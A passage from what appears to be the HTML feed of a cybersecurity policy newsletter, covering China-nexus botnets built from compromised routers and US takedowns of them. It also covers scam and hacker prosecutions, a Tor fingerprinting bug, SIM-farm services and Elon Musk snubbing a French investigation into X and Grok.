President Donald Trump is scheduled to meet China&apos;s President Xi Jinping. A blow up over chips could upset that meeting.&#xA0;</p><p>Still, China has spent the last 20 years pillaging intellectual property from advanced economies, using a <a href="https://ustr.gov/sites/default/files/05.14.2024%20Four%20Year%20Review%20of%20China%20Tech%20Transfer%20Section%20301%20(Final).pdf"><u>comprehensive range of techniques</u></a> that covered the gamut from economic inducements through to cyber espionage.&#xA0;</p><p>It would be an absolute tragedy if key technologies for the next 20 years were stolen as well.&#xA0;</p><h2 id="good-news-everyone-chinese-hackers-adopt-botnets">Good News Everyone! Chinese Hackers Adopt Botnets</h2><p>Chinese threat actors are moving en masse to using botnets of compromised smart devices to facilitate their operations. This makes a network defender&apos;s job more difficult, but presents opportunities for government disruption.</p><p>Last week, the UK&apos;s NCSC and a host of international cyber security authorities jointly <a href="https://www.ncsc.gov.uk/news/defending-against-china-nexus-covert-networks-of-compromised-devices"><u>released an advisory</u></a> detailing a &quot;major shift&quot; in the way Chinese cyber actors are operating. These actors have shifted from rolling their own individual infrastructure to using large-scale networks that are sometimes managed by third parties. The networks are primarily made up of compromised <a href="https://www.acronymfinder.com/Small-Office%2c-Home-Office-(SOHO).html"><u>SOHO routers</u></a> and IoT devices. The NCSC refers to them as &quot;covert networks&quot;. They are commonly known as botnets.</p><p>The report says these networks are used for all aspects of a cyber operation including reconnaissance, malware delivery, command and control, data exfiltration and deniable internet browsing such as researching exploitation techniques.</p><p>The covert networks are a low-cost, low-risk way to disguise the origin of malicious activity. Multiple covert networks have been created, they are constantly being updated and any one network could be used by multiple actors. The NCSC believes &quot;the majority of China-nexus threat actors&quot; are using them.&#xA0;</p><p>Leveraging botnet-based networks isn&apos;t a new idea in the world of state-sponsored espionage. Russian agencies have a very long history of doing exactly that. The <a href="https://en.wikipedia.org/wiki/Federal_Security_Service"><u>FSB</u></a> ran the <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a"><u>Snake malware network</u></a> for 20 years from 2003 and <a href="https://en.wikipedia.org/wiki/GRU_(Russian_Federation)"><u>the GRU</u></a> created the botnets known as <a href="https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected"><u>VPNFilter</u></a> and <a href="https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation"><u>Cyclops Blink</u></a>.&#xA0;&#xA0;</p><p>It does, however, appear that China&apos;s equivalents are commercial endeavours rather than being created and run by a state intelligence organisation.</p><p>Take the Raptor Train botnet for example. In 2024 the US announced a court-authorised takedown of the Chinese botnet that Lumen Technologies <a href="https://www.lumen.com/blog/en-us/derailing-raptor-train"><u>had analysed and named</u></a>. That botnet was formed in 2020, contained more than 60,000 devices at its peak and had, over time, compromised more than 200,000 devices including SOHO routers, <a href="https://en.wikipedia.org/wiki/Digital_video_recorder"><u>DVRs</u></a> and IP cameras. The botnet was run by the hacking group Flax Typhoon, which the US government linked to a Beijing-based cyber security firm, Integrity Technology Group.&#xA0;</p><p>Rather than being a top-down mandate from the <a href="https://en.wikipedia.org/wiki/Ministry_of_State_Security_(China)"><u>Ministry of State Security</u></a> (MSS) or <a href="https://en.wikipedia.org/wiki/Ministry_of_Public_Security_(China)"><u>Ministry of Public Security</u></a> (MPS), Dakota Cary, a China-focused consultant at SentinelOne, told <em>Seriously Risky Business </em>the shift towards using botnets was likely &quot;led by market forces&quot;.&#xA0;</p><p>Eugenio Benincasa, <a href="https://www.nattothoughts.com/p/chinas-vulnerability-research-whats"><u>who authored</u></a> various reports into the <a href="https://ethz.ch/content/dam/ethz/special-interest/gess/cis/center-for-securities-studies/pdfs/cyber-report-2024-from-vegas-to-chengdu.pdf"><u>Chinese cyber espionage ecosystem</u></a>, told <em>SRB</em>&#xA0; the system is both &quot;competitive and collaborative&quot;. He believes the companies that build these covert networks could sell them to multiple customers.&#xA0;</p><p>Additionally, the provincial arms of the MSS and MPS <a href="https://www.nattothoughts.com/p/the-many-arms-of-the-mss-why-provincial"><u>often work &quot;semi-independently</u></a>&quot;, and Benincasa pointed to the <a href="https://news.risky.biz/risky-biz-briefing-the-i-soon-data-leak/"><u>the i-SOON data leak</u></a> as showing a single firm &quot;working with dozens of [MPS or MSS] bureaus across more than 30 provinces&quot;. This fragmentation makes it less likely that the adoption of covert networks is the result of centralised direction.&#xA0;</p><p>A 2024 <a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks/"><u>Mandiant report</u></a> described the beginning of this shift. It detailed what it called a &quot;growing trend among China-nexus cyber espionage&quot; towards covert networks. At the time, Mandiant thought the trend was motivated by &quot;rais[ing] the cost of defending an enterprise&apos;s network and shift[ing] the advantage toward espionage operators by evading detection and complicating attribution&quot;.&#xA0;</p><p>From a government perspective, botnets actually present a disruption opportunity, one that the US has done a half-decent job taking advantage of. In 2024, in addition to Raptor Train, it <a href="https://www.justice.gov/archives/opa/pr/us-government-disrupts-botnet-peoples-republic-china-used-conceal-hacking-critical"><u>also disrupted</u></a> the <a href="https://news.risky.biz/prc-not-stealthy-just-annoying-65c0eb42a0e6da001a37dfb2/"><u>Chinese KV botnet</u></a> and the <a href="https://www.justice.gov/archives/opa/pr/911-s5-botnet-dismantled-and-its-administrator-arrested-coordinated-international-operation"><u>criminal &quot;911 S5&quot; service</u></a>.&#xA0;</p><p>In March this year, <a href="https://www.justice.gov/usao-ak/pr/authorities-disrupt-worlds-largest-iot-ddos-botnets-responsible-record-breaking-attacks"><u>it announced</u></a> that it had disrupted four DDoS botnets.&#xA0;</p><p>So, although these networks have proven worth to adversaries, they are also a point of vulnerability. Adversaries are on a treadmill that involves constantly maintaining, developing and renewing these networks.</p><p>The US disruption track record is, as we said, half decent. But we&apos;d like to see a constant drumbeat of takedowns. Authorities need to increase their pace.</p><p><em>Watch Amberleigh Jack and Tom Uren discuss this edition of the newsletter:</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/KQLf8VK-P5I?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Srsly Risky Biz: US Vows to Fight Distillation Attacks"></iframe></figure><h3 id="three-reasons-to-be-cheerful-this-week">Three Reasons to Be Cheerful This Week:</h3><ol><li><strong>US launches scam crackdown:</strong> The US government <a href="https://www.justice.gov/usao-dc/pr/scam-center-strike-force-takes-major-actions-against-southeast-asian-scam-centers"><u>announced</u></a> a <a href="https://home.treasury.gov/news/press-releases/sb0469"><u>multipronged action</u></a> that targets the entire lifecycle of scam operations. These actions include levying criminal charges against two Chinese nationals, sanctions targeting scammers in Cambodia, disrupting recruitment and &apos;restraining&apos; cryptocurrency to prevent it from being moved. <em>Chainalysis</em> has <a href="https://www.chainalysis.com/blog/asian-scam-centers-crypto-fraud-april-2026/"><u>further coverage</u></a>.&#xA0;&#xA0;</li><li><strong>Alleged Silk Typhoon hacker extradited to the US:</strong> Xu Zewei, a Chinese national <a href="https://www.justice.gov/opa/pr/prolific-chinese-state-sponsored-contract-hacker-extradited-italy"><u>has been extradited</u></a> to the US from Italy, where Xu and his wife were arrested while vacationing in Milan. The US alleges Xu is a member of the Chinese hacking group known as Silk Typhoon (previously Hafnium) and was involved in the 2021 <a href="https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"><u>mass exploitation of Microsoft Exchange servers</u></a> among other things. <em>The Record</em> has <a href="https://therecord.media/chinese-hacker-italy-extradited"><u>further coverage</u></a>.&#xA0;</li><li><strong>Another Scattered Spider Arrest:</strong> A 19-year-old dual United States and Estonian citizen <a href="https://www.bleepingcomputer.com/news/security/us-reportedly-charges-scattered-spider-hacker-arrested-in-finland/"><u>has been arrested</u></a> and is facing charges related to being a member of the Scattered Spider cybercrime group. <em>The Chicago Tribune</em> <a href="https://www.chicagotribune.com/2026/04/27/teen-charged-in-chicago-was-part-of-international-scattered-spider-hacker-group-feds-say/"><u>has further details</u></a> based on court records that were temporarily unsealed.&#xA0;&#xA0;</li></ol><h3 id="sponsor-section">Sponsor Section</h3><p><em>In this <strong>Risky Business sponsor interview</strong>, Casey Ellis chats to RunZero&#x2019;s founder and CEO HD Moore about RunZero&#x2019;s new release: 4.9. It drops this week and doubles down on OT scanning. Animated world and network maps add another layer to visualisation and for those that have been asking: yes, there&#x2019;s a dark mode.</em></p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://risky.biz/RBNEWSSI125/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Sponsored: RunZero accidentally got good at OT - Risky Business Media</div><small><div class="kg-bookmark-description">In this Risky Business sponsored interview Casey Ellis chats to RunZero&#x2019;s founder and CEO HD Moore about RunZero&#x2019;s new release: 4.9. It dr [Read More]</div></small></div></a></figure><h3 id="risky-biz-talks">Risky Biz Talks</h3><p><em>You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (</em><a href="https://risky.biz/feeds/risky-business-news"><em><u>RSS</u></em></a><em>, </em><a href="https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970"><em><u>iTunes</u></em></a><em> or </em><a href="https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q"><em><u>Spotify</u></em></a><em>).&#xA0;&#xA0;</em></p><p><em>In our last &quot;Between Two Nerds&quot; discussion Tom Uren and </em><a href="https://twitter.com/thegrugq"><em><u>The Grugq</u></em></a><em> discuss what the North Korean hack of Drift can tell us about the future of hacking.</em></p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://risky.biz/BTN164/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Between Two Nerds: Hackers from the future - Risky Business Media</div><small><div class="kg-bookmark-description">In this edition of Between Two Nerds Tom Uren and The Grugq discuss what the North Korean hack of Drift can tell us about the future of ha [Read More]</div></small></div></a></figure><p><em>Or watch it on YouTube!</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/_4PgaKZ_tgM?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Between Two Nerds: Hackers from the future"></iframe></figure><p>From <a href="https://news.risky.biz/tag/risky-bulletin/"><em><u>Risky Bulletin</u></em></a>:</p><p><strong>UK NCSC blasts SOC metrics: </strong>The UK&apos;s cybersecurity agency has advised public and private organizations against relying too much on bad metrics to evaluate the efficiency of their security operations centers (SOCs).</p><p>Officials say bad metrics incentivize SOC teams to be careless about their jobs and rush through tickets and detections rather than be dedicated to protecting their networks.</p><p>While metrics can be used for other IT departments to evaluate their effectiveness, the true value of a SOC team comes from insight and not speed or quantity, hence SOC teams should not be treated as any other department that needs to be optimized.</p><p>[<a href="https://news.risky.biz/risky-bulletin-uk-ncsc-blasts-soc-metrics/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>New fingerprinting technique can track Tor users:</strong> Firefox and Tor Browser users are advised to install the latest security patches to address a bug that can allow threat actors to track them across the internet.</p><p>The bug works in normal browsing mode, in private browsing windows, and, in the case of Tor, across different Tor sessions.</p><p>The issue, found by the team at <a href="https://fingerprint.com/blog/firefox-tor-indexeddb-privacy-vulnerability/"><u>Fingerprint</u></a>, resides in <a href="https://developer.mozilla.org/en-US/docs/Web/API/IndexedDB_API"><u>IndexedDB</u></a>, a Firefox API that allows websites to store data inside a user&apos;s browser for future visits.</p><p>The bug allows a threat actor to create an IndexedDB database on the user&apos;s browser&#x2014;when they visit a malicious website or see a malicious ad. The bug itself is that IndexedDB will return the contents of that database in the same order every time, which creates a <strong>universal fingerprint</strong> ideal for tracking.</p><p>[<a href="https://news.risky.biz/risky-bulletin-new-fingerprinting-technique-can-track-tor-users/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>There are now SIM-Farm-as-a-Service providers:</strong> An ugly-looking web panel has been linked to 94 SIM farms located across 17 countries around the globe.</p><p>ProxySmart, as the panel is called, is among the first SIM-Farm-as-a-Service providers observed in cybercrime underground circles.</p><p>According to security firm <a href="https://infrawatch.com/blog/inside-the-mobile-farm-the-oem-stack-powering-us-4g-5g-proxy-networks"><u>Infrawatch</u></a>, the panel was developed by a group operating out of Belarus, a group the company describes as &quot;individuals with long-running involvement in SIM farm and mobile proxy operations.&quot;</p><p>[<a href="https://news.risky.biz/risky-bulletin-there-are-now-sim-farm-as-a-service-providers/"><u>more</u></a> on <em>Risky Bulletin</em>]</p>
  112. Srsly Risky Biz: Musk Snubs French Authorities

    Thu, 23 Apr 2026 03:53:10 -0000

    <p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://nebulock.io/"><em><u>Nebulock</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via</em></p>
    <img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/04/2026-04-23-Elon_Musk_-54348704457-.jpg" alt="Srsly Risky Biz: Musk Snubs French Authorities"><p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://nebulock.io/"><em><u>Nebulock</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via </em><a href="https://risky.biz/feeds/risky-business-news/"><em><u>this RSS feed</u></em></a><em>.</em></p><figure class="kg-card kg-embed-card"> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/SRB164.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/SRB164/&quot;&gt;Srsly Risky Biz: Musk snubs French authorities&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 22:24 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Srsly Risky Biz: Musk snubs French authorities&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> </figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/04/data-src-image-4d03641e-2a82-48e9-93bc-1bdcb5e706a6.jpeg" class="kg-image" alt="Srsly Risky Biz: Musk Snubs French Authorities" loading="lazy" width="2000" height="1334" srcset="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w600/2026/04/data-src-image-4d03641e-2a82-48e9-93bc-1bdcb5e706a6.jpeg 600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1000/2026/04/data-src-image-4d03641e-2a82-48e9-93bc-1bdcb5e706a6.jpeg 1000w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1600/2026/04/data-src-image-4d03641e-2a82-48e9-93bc-1bdcb5e706a6.jpeg 1600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/04/data-src-image-4d03641e-2a82-48e9-93bc-1bdcb5e706a6.jpeg 2048w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Elon Musk at CPAC, Wikimedia Commons</span></figcaption></figure><p>Elon Musk has refused to appear at a voluntary interview relating to a French criminal investigation into illegal content on X and sexual abuse material created by the Grok chatbot.</p><p>The strategy of applying pressure directly on technology company executives is one that French authorities have used before. This incident reminds us of <a href="https://news.risky.biz/durov-bailed-and-must-stay-in-france-report-to-police/"><u>the arrest of Telegram founder and CEO</u></a> Pavel Durov in Paris back in 2024.&#xA0;</p><p>Both Telegram and X are being investigated by the same <a href="https://www.reuters.com/world/europe/behind-arrest-telegram-boss-small-paris-cybercrime-unit-with-big-ambitions-2024-08-30/"><u>aggressive French cybercrime unit</u></a>, but the problems these platforms present to authorities are different. Prior to Durov&apos;s arrest, Telegram was notoriously reluctant to cooperate with authorities and <a href="https://www.nbcnews.com/tech/security/telegram-ceo-pavel-durov-child-safety-rcna168266?ref=news.risky.biz"><u>child safety groups</u></a>. Massive criminal marketplaces flourished on the app. X, on the other hand, does actually enforce <a href="https://help.x.com/en/rules-and-policies#safety-and-cybercrime"><u>rules and policies</u></a>, albeit imperfectly. While it has <a href="https://www.hiig.de/en/policy-changes-of-x-under-musk/"><u>stepped back</u></a> from countering bias or misinformation and has <a href="https://news.risky.biz/outside-america-musks-x-is-a-foreign-influence-threat/"><u>become an amplifier</u></a> of Musk&apos;s own extreme right-wing views, this is not in the same league as allowing criminal activity to flourish.</p><p>X&apos;s French offices were raided in February this year as part of an investigation into whether the platform&apos;s algorithm <a href="https://www.reuters.com/world/europe/paris-prosecutors-probing-musks-x-over-alleged-algorithmic-distortions-2025-02-07/"><u>was politically biased or being manipulated</u></a>. French authorities were also investigating the Grok chatbot&apos;s alleged Holocaust denial and creation of sexually explicit deepfakes, including ones of children. Grok is developed by another of Musk&apos;s companies, xAI, and is integrated into X.&#xA0;</p><p>At the time of the raid, X <a href="https://x.com/GlobalAffairs/status/2018773488602095916"><u>denied any wrongdoing</u></a>, described the allegations as &quot;baseless&quot; and said the investigation was politicised and, &quot;distorts French law, circumvents due process, and endangers free speech&quot;. Musk himself <a href="https://x.com/elonmusk/status/2018785481308438907?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E2018785481308438907%7Ctwgr%5E34d9aa99634c0eb3c5692f3d7c1d3ba8f55f054f%7Ctwcon%5Es1_&amp;ref_url=https%3A%2F%2Fwww.dw.com%2Fen%2Ffrance-probes-x-over-algorithms-and-deepfakes-as-musk-skips-interview%2Fa-76864163"><u>called the investigation</u></a> &quot;a political attack&quot;. After the raid, both Musk and former X CEO Linda Yaccarino were summoned to &quot;voluntary interviews&quot; with French authorities. They had been scheduled for Monday.&#xA0;</p><p>Prosecutors said the hearings were to allow the executives to &quot;present their position regarding the facts and, where appropriate, the compliance measures they plan to put in place&quot;. They said the aim was to ensure X complied with French law on French territory.&#xA0;</p><p>Back in 2024, Durov&apos;s arrest came after he flew into Paris on a private jet. But we don&apos;t think there is any real chance that Musk would have seen the same fate. For starters, Pavel Durov is a French citizen while Musk has American citizenship.</p><p>Thus, Musk is backed by the might of a US government that shares his outlook and ideology. <em>The</em> <em>Wall Street Journal</em> <a href="https://www.wsj.com/business/justice-department-rebuffs-french-on-x-probe-musk-interview-2b8eb080"><u>reported that</u></a> the Department of Justice had rebuffed a French request for assistance in the investigation. Strong language was used in a two-page letter, seen by the <em>WSJ</em>. It said the &quot;investigation seeks to use the criminal legal system in France to regulate a public square for the free expression of ideas and opinions in a manner contrary to the First Amendment of the United States Constitution&quot;. It continued that France&apos;s requests &quot;constitute an effort to entangle the United States in a politically charged criminal proceeding aimed at wrongfully regulating through prosecution the business activities of a social media platform&quot;.&#xA0;</p><p>Despite seemingly minimal risks, neither Musk nor Yaccarino showed on Monday. Why answer uncomfortable questions and risk arrest if doing so is voluntary? If we were his lawyers we certainly wouldn&apos;t recommend putting Paris on Musk&apos;s travel agenda.&#xA0;</p><p>To some degree, it doesn&apos;t matter how the French investigation turns out. Even if it can&apos;t prove matters to a criminal standard, the European Union as a whole has plenty of regulatory firepower, including the <a href="https://en.wikipedia.org/wiki/Digital_Services_Act"><u>European Digital Services Act</u></a> (DSA).&#xA0;</p><p>The DSA <a href="https://www.gmfus.org/news/eus-digital-markets-act-and-digital-services-act"><u>requires that</u></a> platforms must assess and mitigate risks such as disinformation and election manipulation. We <a href="https://www.pbs.org/newshour/politics/how-elon-musk-uses-his-x-social-media-platform-to-amplify-right-wing-views"><u>suspect that</u></a> it <a href="https://www.nature.com/articles/s41586-026-10098-2"><u>might be hard</u></a> for X <a href="https://theconversation.com/a-few-weeks-of-xs-algorithm-can-make-you-more-right-wing-and-it-doesnt-wear-off-quickly-276153"><u>to prove</u></a> that it is <a href="https://news.sky.com/story/the-x-effect-how-elon-musk-is-boosting-the-british-right-13464445"><u>effectively mitigating</u></a> some of <a href="https://techcrunch.com/2025/02/19/study-of-tiktok-x-for-you-feeds-in-germany-finds-far-right-political-bias-ahead-of-federal-elections/"><u>these risks</u></a>. Potential penalties include large fines and even temporary suspension of the service across the European Union.</p><p>The Trump administration is <a href="https://www.independent.co.uk/news/world/europe/hungary-election-viktor-orban-europe-magyar-b2956377.html"><u>increasingly unpopular</u></a> in Europe. The political reality is that X will be increasingly under fire because it actively promotes the administration&apos;s ideology.&#xA0;</p><p>X <a href="https://www.euronews.com/my-europe/2025/12/05/european-commission-hits-elon-musks-social-network-x-with-120-million-fine?utm_source=chatgpt.com"><u>was already fined</u></a> &#x20AC;120 million (USD$140 million) in December last year, by the European Commission, for failing to meet various transparency requirements. These included the fact that any everyday user could purchase verified checkmarks and the platform did not provide researchers with access to data.&#xA0;</p><p>So where is this heading? We can&apos;t see Musk reinvigorating X&apos;s trust and safety teams to counter bias, disinformation and influence campaigns any time soon. Formal government investigations take time, but they <a href="https://www.theguardian.com/technology/2026/jan/26/eu-launches-inquiry-into-x-over-sexually-explicit-images-made-by-grok-ai?utm_source=chatgpt.com"><u>are coming</u></a>. Our prediction: Fines for X will rack up, the company will fight them, and we get to enjoy the show.&#xA0;</p><h2 id="theyve-got-702-problems-and-the-fbi-is-one">They&apos;ve Got 702 Problems and the FBI is One</h2><p>The Congressional reauthorisation of Section 702 of the Foreign Intelligence Surveillance Act (FISA) will require some horse trading.</p><p><a 